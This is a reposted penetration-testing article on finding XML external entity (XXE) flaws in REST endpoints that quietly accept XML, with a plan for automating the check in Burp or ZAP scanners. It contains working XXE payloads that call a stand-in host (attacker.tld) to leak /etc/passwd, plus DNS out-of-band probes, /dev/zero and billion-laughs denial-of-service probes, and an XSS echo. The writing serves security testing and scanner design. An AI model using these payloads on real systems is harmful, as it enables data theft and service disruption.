参考连接:https://www.christian-schneider.net/GenericXxeDetection.html

In this article I present some thoughts about generic detection of XML eXternal Entity (XXE) vulnerabilities during manual pentests supplemented with some level of automated tests. The ideas in this blog post (derived from experiences of several typical and untypical XXE detections during blackbox pentests) can easily be transformed into a generic approach to fit into web vulnerability scanners and their extensions.

This is done by demonstrating an example of where service endpoints that are used in a non-XML fashion can eventually be accessed with XML as input format too, opening the attack surface for XXE attacks.

At the time of writing this article I've started to develop a Burp Extension ("Generic XXE Detector") and will eventually also transform it into a ZAP extension, letting this kind of detection approach make its way into these scanners - if I find the time to complete that.

XXE detection in service endpoints

During blackbox pentesting one often gets in front of some service endpoints (mostly REST based ones used from within single-page apps in browsers). These RESTful endpoints often offer JSON as transport format, but many server-side development frameworks (like JAX-RS for Java based RESTful services) make it very easy for developers to offer also an XML based data exchange format for input and/or output out-of-the-box. If such alternative formats exist, they can easily be triggered using proper Content-Type request header values (like text/xml or application/xml).

So the challenge is to find these endpoints which also accept XML as input format, even though the client (webpage) only uses JSON or direct path- or query-params to access the service. To scale this from a manual pentesting trick into a way of automation, the tool to scan for this needs a generic XXE detection approach, which can easily be applied to every URL the active scanner sees in its scope during a pentest.

In one very interesting case of an XXE finding inside a Java based service endpoint (during a blackbox pentest) I came across a service endpoint that only had path- and query-params as input source and responded with JSON. Basically it was even a simple GET based service (no POST there). So this didn't really look much like "let's try some XXE Kung-Fu here...". Especially the tools including Burp didn't find any XXE at this spot when actively scanning it (even with thorough scanning configured).

But after several manual tries, I managed to squeeze an XXE out of it, since it indeed was a REST service which also accepted XML out-of-the-box. I had to apply several tricks though, in order to get the XXE to work:

  • I tried to convert the request from a GET to a POST in order to also send XML as the request body. Unfortunately POST was not accepted (as the service was only mapped to GET), so I had to stick to GET requests.
  • I removed the query-params as well as path-params from the request URL in order to not let these get picked up by the service. As this was a blackbox pentest, I can only assume that removing the query-params led towards a mode of the service endpoint accepting the input also via other formats (i.e. when automatically mapped from XML input for example). Accessing the service without the used path- and query-params resulted in an error message (no input data available).
  • Even though only GET could be used, I then added the Content-Type: application/xml request header and some non-conforming invalid XML as the request body: This was rewarded with an XML error message, showing that some kind of parsing process picked up the body payload of the GET request, i.e. making it an interesting target to investigate further. Adding the path- and query-params back to the request resulted in a business error message, so that the exploit seems to require to remove them, as they might take precedence over the XML body otherwise.

As I then had a way of letting the server parse my XML and received at least replies with some technical error messages from the parser, I tried to use the XXE to exfiltrate some data (like /etc/passwd or just listing of base directory /): As the expected XML format for this kind of service call was not known to me (blackbox assessment), I had to use a more generic approach, which works even without placing the entity reference in the proper XML element. Also (as tested afterwards) when the server got the XML as expected, it didn't return any dynamic response, so only the technical error was echoed back. Of course the great out-of-band (OOB) exfiltration technique by T.Yunusov and A.Osipov would work as a generic approach to exfiltrate content in such a scenario.

But since (at least for current Java environments) this kind of URL-based OOB exfiltration only allowed to exfiltrate contents of files consisting of only one line (as CRLFs break the URL to the attacker's server), I managed to combine it with the technical error message the server replied and read the data from there:

  • The idea is to use the trick of passing the data carrying parameter entity itself into another file:/// entity in order to trigger a file-not-found exception on the second file access with the content of the first file as the name of the second file, which was thankfully echoed back completely from the server as a file-not-found exception (so pure OOB exfiltration wasn't required here):

Attacker's DTD part applying a file-not-found exception echo trick (hosted on attacker's server at http://attacker.tld/dtd-part):

<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">

Request (exploiting the XXE like in the regular OOB technique by Yunusov & Osipov):

GET /service/ HTTP/1.1
Host: example.com:443
Content-Type: application/xml
Content-Length: 161 <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>

Response (delivering the data as file-not-found error message):

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 1851
Connection: close javax.xml.bind.UnmarshalException
- with linked exception:
[java.io.FileNotFoundException: /root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
... ... ...
... ... ...
... ... ...
apache:x:54:54:Apache:/var/www:/sbin/nologin (No such file or directory)]

Using this file-not-found exception echo trick to read the data not only solved the "one line only" exfiltration problem, it also lifted some restrictions that existed with XXE exploitations when used directly inside the XML elements: Contents of files that contain XML special meta chars (like < or >) would break the XML structure. This is no longer a problem with the above mentioned trick.

After that all worked pretty well, I discovered that Ivan Novikov has recently blogged about some pure OOB techniques that even exfiltrate data under Java 1.7+ using the ftp:// scheme and a customized FTP server. This would have worked in the above mentioned scenario as well - even when the server does not return technical error messages, as it is a pure OOB exfiltration trick.

As a small side note: This file-not-found exception echo trick might also be used as an XSS in some cases by trying to echo <script>alert(1)</script> as the filename. Often these technical error messages might not be properly escaped when echoed back, compared to situations where non-error-messages originating from regular XML element input will be reflected. But this XSS is rather difficult to exploit in real scenarios, since it would not be easy to trigger the desired request from a victim's browser – if not even impossible depending on the http method (in this example a strange GET with request body).

Automating this as a scanning approach

Finding such an XXE vulnerability in a service endpoint using only manual pentesting tricks (as the scanners didn't detect it) made me think of a generic approach that is capable of detecting such a vulnerability automatically. Basically the scanning technique should try this on every (in-scope) request it sees, even when the request in question does not contain any XML data (as in the scenario of the RESTful service above that used mainly JSON).

So here are the ideas I came up with (which I will also prototype as a Burp and/or ZAP extension soon). The scanner should perform the following steps on every request it is allowed to scan actively. This should be done in addition to any regular XXE detections the scanner already has in place. The following technique is just intended to detect scenarios like the above mentioned:

  1. Issue the request with original path- and/or query-params and with the http POST method as well as its original http method (even GET) and place a generic DTD based payload in the request body that directly references the parameter entity, like the following: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///some-non-existing.file" > %xxe; ]>. Don't forget to add the Content-Type: application/xml header to the request (also try with text/xml as well).

    • If the response contains an error like the following (effectively echoing the filename back in some kind of file-not-found message), flag it as potential XXE: javax.xml.bind.UnmarshalException - with linked exception: [java.io.FileNotFoundException: /some-non-existing.file (No such file or directory)]
    • You can also compare the response content of the previous step of accessing a non-existing file with accessing a valid existing file like /etc/passwd. This might catch some differences between the error responses of non-existing files vs. existing files that do not contain valid content to place inside the DTD.
    • If it is also possible to echo in the file-not-found exception message some <script>alert(1)</script> as the filename, flag it as XSS too, but one that is difficult to exploit (and depending on the http method required eventually impossible to exploit).
  2. If the steps above didn't trigger an XXE condition, try to remove the original request's query-params and try the above steps again. Finally try to strip each path-param as well (just in case the service is picking this up also and then does not try to access input from the XML body instead) and retry step one.
  3. If the steps above didn't trigger an XXE condition, try to use the well-known OOB techniques (see the referenced links above for more details regarding these cool tricks):
    • Use a payload like the following (still having the Content-Type header set to application/xml): <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM"http://attacker.tld/xxe/ReqNo" > %xxe; ]>, where ReqNo is replaced by a unique number for every request scanned. This unique number is required (when parsing the attacker's webserver logs) to correlate log entries with the scanned requests that should then be flagged as XXE candidates. The best results would be gained if the scanner offers some kind of drop-in where (at the end of the pentesting assignment) the observed webserver logs (of the attacker's webserver) can be given to the scanning engine for checking against the issued OOB request numbers for matches.
  4. If the steps above didn't trigger an XXE condition (eventually because the server cannot access the attacker's webserver), try to use established DNS-based OOB exfiltration techniques, where part of the domain name contains the XXE request number ReqNo from the previous step, like in the following payload: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://ReqNo.xxe.attacker.tld" > %xxe; ]>. That way at least the DNS resolution to the attacker's domain via its DNS server might be used to trigger the XXE match when after the pentest the logs of the DNS server are parsed by the scanner to correlate them with the scanned requests.
  5. If the steps above didn't trigger an XXE condition, we have to go completely blind only on sidechannels like timing measurements: This could be done by checking various internally reachable ports while measuring the response time of the payload <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:80" > %xxe; ]> versus the response time of <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM"http://127.0.0.1:9876" > %xxe; ]>
    • Similar checks can be performed with file:/// URLs by accessing small vs. big files. When being a risky scanner, you can try to measure the increase in response time when accessing /dev/zero as the file (eventually killing the thread on the server).
    • Also a risky scanner can try to measure the processing time of nested (non-external) expansions like in the "billion laughs attack".

Note that in the above scenarios the concrete XML format does not need to be known to the scanner, so it can easily apply this scanning technique on requests even when they haven't used any XML during passive observations. All XML payloads are completely self-contained within the DTD section. The idea is to issue this kind of scan on every request to automatically identify places where service endpoints or alike also offer to be accessed using XML, as is the case with some RESTful development frameworks.

Some of the XML DTD payloads above (those using the OOB requests to detect XXE either by inspecting the attacker's webserver logs or measuring the timing differences) can even be shortened to a pure external DTD approach like this: <!DOCTYPE test SYSTEM "http://attacker.tld/xxe/ReqNo"> or <!DOCTYPE test SYSTEM "file:///dev/zero">. But the longer tests presented above give more confidence to the XXE finding, since the shorter version only validates that external DTDs and not entities can be loaded.

Conclusion

As a Pentester
Watch out for any service-like endpoints in the application to pentest and try to force them to accept XML, even when the usage of these endpoints from within the application utilizes other kinds of input formats (like query- or path-params or JSON post bodies). In a lucky case where the endpoint is also configured to accept XML, try to further exploit this as an XXE condition.
As a Scanner Vendor
Try to incorporate ideas like the steps presented in this article into your scanning engines augmenting them with automated parsing of log files to ease generic XXE detection with OOB techniques, even when scanning large attack surfaces (and make the attacker's exfiltration URL configurable).

Generic XXE Detection的更多相关文章

  1. 论文学习-深度学习目标检测2014至201901综述-Deep Learning for Generic Object Detection A Survey

    目录 写在前面 目标检测任务与挑战 目标检测方法汇总 基础子问题 基于DCNN的特征表示 主干网络(network backbone) Methods For Improving Object Rep ...

  2. nginx配合modsecurity实现WAF功能

    一.准备工作 系统:centos 7.2 64位.nginx1.10.2, modsecurity2.9.1 owasp3.0 1.nginx:http://nginx.org/download/ng ...

  3. 如何使用event 10049分析定位library cache lock and library cache pin

    Oracle Library Cache 的 lock 与 pin 说明 一. 相关的基本概念 之前整理了一篇blog,讲了Library Cache 的机制,参考: Oracle Library c ...

  4. R-CNN论文翻译

    R-CNN论文翻译 Rich feature hierarchies for accurate object detection and semantic segmentation 用于精确物体定位和 ...

  5. OpenCV特征点提取----Fast特征

    1.FAST(featuresfrom accelerated segment test)算法 http://blog.csdn.net/yang_xian521/article/details/74 ...

  6. ICCV2013、CVPR2013、ECCV2013目标检测相关论文

    CVPapers 网址: http://www.cvpapers.com/   ICCV2013 Papers about Object Detection: 1. Regionlets for Ge ...

  7. Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition

    Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition Kaiming He, Xiangyu Zh ...

  8. zz深度学习目标检测2014至201901综述

    论文学习-深度学习目标检测2014至201901综述-Deep Learning for Generic Object Detection A Survey  发表于 2019-02-14 |  更新 ...

  9. (转载) AutoML 与轻量模型大列表

    作者:guan-yuan 项目地址:awesome-AutoML-and-Lightweight-Models 博客地址:http://www.lib4dev.in/info/guan-yuan/aw ...

随机推荐

  1. [WC2008]游览计划(状压dp)

    题面太鬼畜不粘了. 题意就是给一张n*m的网格图,每个点有点权,有k个关键点,让你把这k个关键点连成一个联通快的最小代价. 题解 这题nmk都非常小,解法肯定是状压,比较一般的解法插头dp,但不太好写 ...

  2. Codeforces 1051E. Vasya and Big Integers

    题意:给你N个点M条边,M-N<=20,有1e5个询问,询问两点的最短距离.保证没有自环和重边. 题解:连题目都在提示你这个20很有用,所以如果是颗树的话那任意两点的最短距离就是求一下lca搞一 ...

  3. postgreSQL学习(一):在Linux下安装postgreSQL

    1. 安装源: $ sudo yum install https://download.postgresql.org/pub/repos/yum/10/redhat/rhel-7-x86_64/pgd ...

  4. 【CH6802】车的放置

    题目大意:给定一个 N*M 的棋盘,棋盘上有些点不能放置任何东西,现在在棋盘上放置一些车,问最多可以放置多少个车而不会互相攻击. 题解:将放置一个车看作连接一条无向边,因为每一行和每一列之间只能放置一 ...

  5. 第二十六篇-单击事件、Toast(提示框信息)

    单击事件有3种方法: 第一种: layout.xml <?xml version="1.0" encoding="utf-8"?> <Line ...

  6. bat 复制文件夹,文件名递增 等操作

    句尾无';' @echo off : 回显,使命令不在dos中一行一行输出 pause : 暂停,以便看到输出结果 变量 %% 与 % % : https://zhidao.baidu.com/que ...

  7. 【译】8. Java反射——注解

    原文地址:http://tutorials.jenkov.com/java-reflection/annotations.html ================================== ...

  8. JS模块化开发(三)——seaJs+grunt

    1.seaJs直接构建存在的问题 由于模块之间的依赖require引用的是模块名,当多个js模块被合并成一个时,会由于找不到模块名而报错 2.seaJs+grunt开发 用到的插件:grunt-cmd ...

  9. 我眼中的正则化(Regularization)

    警告:本文为小白入门学习笔记 在机器学习的过程中我们常常会遇到过拟合和欠拟合的现象,就如西瓜书中一个例子: 如果训练样本是带有锯齿的树叶,过拟合会认为树叶一定要带有锯齿,否则就不是树叶.而欠拟合则认为 ...

  10. mac设计师系列 Adobe “全家桶” 15款设计软件 值得收藏!

    文章素材来源:风云社区.简书 文章收录于:风云社区 www.scoee.com,提供1700多款mac软件下载 Adobe Creative Cloud 全线产品均可开放下载(简称Adobe CC 全 ...